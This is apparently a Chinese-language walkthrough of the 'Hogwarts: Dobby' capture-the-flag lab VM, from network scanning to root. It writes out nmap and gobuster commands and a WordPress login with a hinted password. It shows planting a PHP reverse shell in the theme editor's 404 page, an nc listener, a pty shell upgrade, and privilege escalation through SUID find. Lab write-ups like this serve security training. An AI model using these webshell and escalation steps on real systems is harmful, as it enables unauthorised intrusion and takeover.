Hogwarts Dobby

HOGWARTS: DOBBY

一、基本信息

名称:Hogwarts: Dobby

发布日期:2020.11.8

作者:BLY

系列:Hogwarts

推特:@BertrandLorent9

二、靶机简介

Flags:

root:/root/proof.txt

难度:简单

三、文件信息

文件名:dobby.ova

文件大小:3.7GB

下载地址:

MD5: 11B9FD40B70344A71B432A608EE640AB

SHA1: 68110B92FD58D6A4C8F0CDBE169E29259AC797A6

四、镜像信息

格式:Virtual Machine (Virtualbox - OVA)

操作系统:Linux(ubuntu)

五、网络信息

DHCP服务:可用

IP地址:自动分配

六、环境配置

1.将靶机dobby和攻击机kali2021在VirtualBox下设置为仅主机模式,使用DHCP分配ip地址:

image-

七、攻略步骤

信息探测

1.因为是没有直接告知我们靶机ip的,所以要先进行主机探测,先查看下kali分配到的ip,在进行网段扫描,命令如下,得到靶机ip为192.168.56.102:

1
ifconfig,查看kali分配到的ip

image-

1
nmap -sP 192.168.56.0/24,扫描靶机ip

image-

2.再进行端口扫描,发现只开放了80端口,访问主页,还是apache的默认页,但源码有路径提示:

1
nmap -T4 -sC -sV -p- --min-rate=1000 192.168.56.126 | tee nmapscan,端口扫描

image-

image-

3.最后再进行一下目录扫描,/log目录值得关注一下:

1
gobuster dir -u http://192.168.56.126 -x html,php,bak,txt --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt,目录扫描

image-

网页发现

1.访问/alohomora目录,发现Draco用户的密码提示:

image-

2.访问/log目录,发现直接提示了一个密码和路径:

image-

3.继续访问/DiagonAlley,发现一串brainfuck编码,且这个页面是用wordpress搭建的:

image-

4.将brainfuck字串解码,但解出来是乱码:

image-

Wordpress后台登录,写入shell

1.再从wordpress入手,用wpscan进行扫描,但没有过多问题:

1
wpscan --url http://192.168.56.126/DiagonAlley --detection-mode aggressive

image-

2.进入wp-login.php后台页,我们有用户draco,而提示他的马的名字slytherin就是密码:

image-

3.进入wordpress后台后,对kali自带的webshell,/usr/share/webshells/php/php-reverse-shell.php进行ip及端口修改,在Apariencia-Editor de temas-Error 404页写入:

1
vim /usr/share/webshells/php/php-reverse-shell.php

image-

image-

4.在kali开启对应端口监听,访问/DiagonAlley目录下不存在页即可触发shell,再利用python构建交互式shell:

1
2
3
nc -lvnp 9001

python3 -c 'import pty; pty.spawn("/bin/bash");'

image-

image-

root提权

1.查找有suid的文件,发现find:

1
find / -perm -u=s -type f 2>/dev/null | grep usr/bin

image-

2.利用find可以直接提权到root:

1
find . -exec /bin/sh -p \; -quit

image-

Flag获取

1.现在我们在/root目录下能够发现flag,即proof.txt:

1
2
3
cd /root
ls -la
vi proof.txt

image-